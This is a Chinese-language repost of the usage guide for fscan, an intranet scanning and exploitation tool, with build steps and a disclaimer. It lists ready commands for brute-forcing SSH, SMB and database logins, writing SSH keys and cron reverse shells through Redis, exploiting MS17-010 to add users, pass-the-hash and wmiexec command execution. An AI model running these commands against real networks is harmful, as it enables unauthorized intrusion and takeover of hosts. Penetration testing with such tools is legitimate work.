一、简介
一款内网综合扫描工具,方便一键自动化、全方位漏扫扫描。支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。
原项目:https://github.com/shadow1ng/fscan
二、主要功能
1.信息搜集:
-
存活探测(icmp) -
端口扫描
2.爆破功能:
-
各类服务爆破(ssh、smb、rdp等) -
数据库密码爆破(mysql、mssql、redis、psql、oracle等)
3.系统信息、漏洞扫描:
-
netbios探测、域控识别 -
获取目标网卡信息 -
高危漏洞扫描(ms17010等)
4.Web探测功能:
-
webtitle探测 -
web指纹识别(常见cms、oa框架等) -
web漏洞扫描(weblogic、st2等,支持xray的poc)
5.漏洞利用:
-
redis写公钥或写计划任务 -
ssh命令执行 -
ms17017利用(植入shellcode),如添加用户等
6.其他功能:
-
文件保存
三、使用说明
fscan.exe -h 192.168.1.1/24 (默认使用全部模块)
fscan.exe -h 192.168.1.1/16 (B段扫描)
其他用法
fscan.exe -h 192.168.1.1/24 -np -no -nopoc(跳过存活检测 、不保存文件、跳过web poc扫描)
fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis 写公钥)
fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 计划任务反弹shell)
fscan.exe -h 192.168.1.1/24 -c whoami (ssh 爆破成功后,命令执行)
fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 (指定模块ssh和端口)
fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt -userf users.txt (加载指定文件的用户名、密码来进行爆破)
fscan.exe -h 192.168.1.1/24 -o /tmp/1.txt (指定扫描结果保存路径,默认保存在当前路径)
fscan.exe -h 192.168.1.1/8 (A段的192.x.x.1和192.x.x.254,方便快速查看网段信息 )
fscan.exe -h 192.168.1.1/24 -m smb -pwd password (smb密码碰撞)
fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模块)
fscan.exe -hf ip.txt (以文件导入)
fscan.exe -u http://baidu.com -proxy 8080 (扫描单个url,并设置http代理 http://127.0.0.1:8080)
fscan.exe -h 192.168.1.1/24 -nobr -nopoc (不进行爆破,不扫Web poc,以减少流量)
fscan.exe -h 192.168.1.1/24 -pa 3389 (在原基础上,加入3389->rdp扫描)
fscan.exe -h 192.168.1.1/24 -socks5 127.0.0.1:1080 (只支持简单tcp功能的代理,部分功能的库不支持设置代理)
fscan.exe -h 192.168.1.1/24 -m ms17010 -sc add (内置添加用户等功能,只适用于备选工具,更推荐其他ms17010的专项利用工具)
fscan.exe -h 192.168.1.1/24 -m smb2 -user admin -hash xxxxx (pth hash碰撞,xxxx:ntlmhash,如32ed87bdb5fdc5e9cba88547376818d4)
fscan.exe -h 192.168.1.1/24 -m wmiexec -user admin -pwd password -c xxxxx (wmiexec无回显命令执行)
完整参数
-c string
ssh命令执行
-cookie string
设置cookie
-debug int
多久没响应,就打印当前进度(default 60)
-domain string
smb爆破模块时,设置域名
-h string
目标ip: 192.168.11.11 | 192.168.11.11-255 | 192.168.11.11,192.168.11.12
-hf string
读取文件中的目标
-hn string
扫描时,要跳过的ip: -hn 192.168.1.1/24
-m string
设置扫描模式: -m ssh (default "all")
-no
扫描结果不保存到文件中
-nobr
跳过sql、ftp、ssh等的密码爆破
-nopoc
跳过web poc扫描
-np
跳过存活探测
-num int
web poc 发包速率 (default 20)
-o string
扫描结果保存到哪 (default "result.txt")
-p string
设置扫描的端口: 22 | 1-65535 | 22,80,3306 (default "21,22,80,81,135,139,443,445,1433,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017")
-pa string
新增需要扫描的端口,-pa 3389 (会在原有端口列表基础上,新增该端口)
-path string
fcgi、smb romote file path
-ping
使用ping代替icmp进行存活探测
-pn string
扫描时要跳过的端口,as: -pn 445
-pocname string
指定web poc的模糊名字, -pocname weblogic
-proxy string
设置代理, -proxy http://127.0.0.1:8080
-user string
指定爆破时的用户名
-userf string
指定爆破时的用户名文件
-pwd string
指定爆破时的密码
-pwdf string
指定爆破时的密码文件
-rf string
指定redis写公钥用模块的文件 (as: -rf id_rsa.pub)
-rs string
redis计划任务反弹shell的ip端口 (as: -rs 192.168.1.1:6666)
-silent
静默扫描,适合cs扫描时不回显
-sshkey string
ssh连接时,指定ssh私钥
-t int
扫描线程 (default 600)
-time int
端口扫描超时时间 (default 3)
-u string
指定Url扫描
-uf string
指定Url文件扫描
-wt int
web访问超时时间 (default 5)
-pocpath string
指定poc路径
-usera string
在原有用户字典基础上,新增新用户
-pwda string
在原有密码字典基础上,增加新密码
-socks5
指定socks5代理 (as: -socks5 socks5://127.0.0.1:1080)
-sc
指定ms17010利用模块shellcode,内置添加用户等功能 (as: -sc add)
四、安装使用
4.1 安装过程:
环境centos
1编译命令
go build -ldflags="-s -w " -trimpath main.go
upx -9 fscan.exe (可选,压缩体积)
在编译过程可能会出现 i/o timeout
4.2 解决方案
4.2.1 检查网络
GO111MODULE=on GOPROXY=https://goproxy.cn,direct go list -m -json -versions golang.org/x/text@latest
输出结果表明你的网络是正常的,所以你的配置环境和执行环境可能还是有些问题。
这可能是由于网络问题或代理问题引起的。以下是一些可能的解决方案:
4.2.2 检查代理设置:
如果你使用了代理服务器,请确保你的代理设置正确,并且允许对 proxy.golang.org
的访问。
4.2.3 尝试手动下载:
你可以尝试手动从浏览器或者使用 curl
命令下载所需的文件,然后将其放置在合适的位置。
4.2.4更换下载源:
你可以尝试使用其他镜像源或代理来下载所需的模块。有时候某些源可能会出现问题,切换到另一个镜像源可能会解决问题。
例如,对于 Go 语言的模块下载,你可以设置 GOPROXY
环境变量,使用其他代理或镜像源。
export GOPROXY=https://goproxy.io,direct
然后再次运行你的命令。
4.2.5尝试其他下载方式:
如果你使用的是特定的下载命令,考虑尝试其他的下载方式,比如使用 wget
或者其他工具来下载所需的文件。
如果上述方法都没有解决问题,可能是由于临时的网络问题或者 proxy.golang.org
的服务器问题。你可以稍后再尝试。如果问题仍然存在,建议查看官方文档或社区论坛,看看其他用户是否遇到了类似的问题并找到了解决方法。
4.3 安装完成
最终出现一个可执行文件 mian
五、运行使用
1 全盘扫描./main -h ip/22
2跳过存活检测 、不保存文件、跳过web poc扫描
更多用法请移步原项目:https://github.com/shadow1ng/fscan
参考:https://github.com/shadow1ng/fscan
鸣谢:https://github.com/shadow1ng
免责声明
本文发布的工具和脚本、命令,仅用作测试和学习研究,不得用于商业用途,文章不对其合法性,准确性,完整性和有效性做出相关保障、保证,请自行判断。本文只对fscan 仅用于学习研究记录,文章对fscan 不具其他任何担保与保证,请根据情况自行判断使用。非学习研究测试,从而产生一切的法律后果,我们概不负责。
本文所涉及的脚本、工具以及基本操作文档、思路等均收集于网络,请勿商用,仅供个人学习使用,任何单位或个人认为该项目的脚本可能涉嫌侵犯其权利,请及时通知并提供身份证明,所有权证明,我们会核实认证资料后删除相关内容。
任何使用文章中的工具、思路及技术、命令等进行非法盈利的目的,由此引起的法律后果我们概不负责。
本站所有资源文章出自互联网收集整理,本站不参与制作,如果侵犯了您的合法权益,请联系本站我们会及时删除。
本站发布资源来源于互联网,可能存在水印或者引流等信息,请用户擦亮眼睛自行鉴别,做一个有主见和判断力的用户。
本站资源仅供研究、学习交流之用,若使用商业用途,请购买正版授权,否则产生的一切后果将由下载用户自行承担。
联系方式(#替换成@):adminlr###msn.cn
ding
科学上网
https://github.com/truth5/5#readme